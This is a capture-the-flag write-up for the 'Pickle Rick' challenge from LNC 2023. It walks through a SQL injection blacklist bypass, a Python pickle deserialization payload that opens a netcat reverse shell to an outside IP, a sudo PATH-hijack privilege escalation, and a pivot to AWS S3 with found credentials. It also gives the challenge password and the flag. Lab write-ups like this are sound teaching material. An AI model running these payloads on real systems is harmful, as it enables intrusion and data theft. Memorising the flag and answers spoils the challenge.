# Pickle Rick | Difficulty | Points | Solves | | ---------- | ------ | ------ | | Hard | X | X | ## Description Rick has turned himself into a pickle, can you find him before its too late... File is temporarily hosted at MD5: ba83987433851f2101f846e89b9b99f6 SHA256: 1dd4388022be3946a72dd3fcf2603896396a8574d5dbe214f9ecf1b0a8b2db92\ Password: `&y9PBYf8gZ^996s9` I will suggest giving participants link to download the file before the CTF start, and only release the password after the CTF started. ## Solution 1. sql injection bypassing blacklist ``` "oR"2"LiKE"2 ``` 2. Python insecure desirialization with the pickle modules for RCE sample payload ```py import pickle import os class RCE: def __reduce__(self): cmd = 'rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.174.136 4444 >/tmp/f' return os.system, (cmd,) if __name__ == '__main__': pickled = pickle.dumps(RCE()) with open("pickled_data.pickle", "wb") as f: f.write(pickled) ``` 3. Binary with the SUID bit in opt director `/opt/clean_pickle.sh` Running sudo -l shows the user is able to run sudo on `/opt/clean_pickle.sh` with `SETENV` AND `NOPASSWD` Exploit script ```sh echo "cp /bin/sh /tmp/qaz; chmod +s /tmp/qaz" > /tmp/rm sudo PATH=/tmp:$PATH /opt/clean_pickle.sh /tmp/qaz -p ``` 4. Pivoting to AWS Cloud In `/root/.aws/credentials` there is a clear text IAM Creds for AWS cloud. Enumerate the perms and list the s3 files. ``` [default] aws_access_key_id = redacted aws_secret_access_key = redacted ``` 5. Get flag :D ```sh aws configure AWS Access Key ID [****************E5EW]: redacted AWS Secret Access Key [****************O+wn]: redacted Default region name [None]: Default output format [None]: aws s3 ls 2023-02-13 16:12:01 lnc-pickle-shop aws s3 ls lnc-pickle-shop 2023-02-13 16:12:56 26 flag.txt aws s3 cp s3://lnc-pickle-shop/flag.txt flag.txt download: s3://lnc-pickle-shop/flag.txt to ./flag.txt cat flag.txt ``` ## Flag `LNC2023{1m_p1ckl3_r1111ck}` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://kabinet.gitbook.io/ctf-writeup/authored/lag-and-crash-2023/pickle-rick.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.